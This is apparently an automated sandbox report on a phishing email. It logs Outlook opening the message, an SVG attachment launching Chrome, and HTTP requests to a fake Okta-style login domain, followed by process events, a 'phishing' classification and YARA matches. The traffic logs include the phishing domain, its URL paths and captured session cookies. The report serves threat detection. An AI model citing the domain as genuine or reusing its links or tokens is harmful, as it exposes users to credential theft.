laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://quiltercheviot.uuvght.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://quiltercheviot.uuvght.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://quiltercheviot.uuvght.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250318%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250318T152121Z&X-Amz-Expires=300&X-Amz-Signature=740f45a720998c47938f1f35aa27b630e9cecf67a7bc9d7db99a8bfda1749aba&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://quiltercheviot.uuvght.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /GDSherpa-vf.woff2 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveOrigin: https://quiltercheviot.uuvght.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-vf2.woff2 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveOrigin: https://quiltercheviot.uuvght.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /34ffrvM4h24NzkkyD6SwzVMu9WijuexAcp9VzMOlBVr67107 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /kljLcPWShXHXVYYUU12tSUDv56HXYBL0GF0xXh47yqPLMdA7Eah01QPwx220 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /klet11CCZk79YbQutqnTSKM1JZecexnomL2CqqrpyZHGyJ74c2fkogJFPjUKjFZ1HDbo2ab224 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /klet11CCZk79YbQutqnTSKM1JZecexnomL2CqqrpyZHGyJ74c2fkogJFPjUKjFZ1HDbo2ab224 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /kljLcPWShXHXVYYUU12tSUDv56HXYBL0GF0xXh47yqPLMdA7Eah01QPwx220 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /wxEAvfh79xY931O7OkQQ5DeTPrst9wZU0uuvZgKtV34130 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /qrP6RmVW07q5q2IzmAMefCmNGikm8kh7E6AP45140 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: classification engine Classification label: mal100.phis.evad.winEML@25/36@46/110
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE File created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE File created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20250318T1122140619-2468.etl
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE File read: C:\Users\desktop.ini
                Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\message__0XSkcQEiS5ehXOfhSk9JKw_geopod_ismtpd_30_.eml"
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "A7DF7246-10A0-4098-9443-EDC4BD1936C6" "66FD239E-9DE5-46C9-9CD3-55A0C6CBD113" "2468" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\RNAYJ7P1\9114950926.svg
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1972,i,10470063623338701964,3264311356742323731,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2080 /prefetch:3
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: apphelp.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: c2r64.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: userenv.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: msasn1.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: kernel.appcore.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: cryptsp.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: rsaenh.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: gpapi.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Window found: window name: SysTabControl32
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara matchFile source: 1.1.d.script.csv, type: HTML
                Source: Yara matchFile source: 2.12..script.csv, type: HTML
                Source: Yara matchFile source: 2.13..script.csv, type: HTML
                Source: Yara matchFile source: 2.3.pages.csv, type: HTML
                Source: Yara matchFile source: 2.4.pages.csv, type: HTML
                Source: Yara matchFile source: 2.5.pages.csv, type: HTML
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
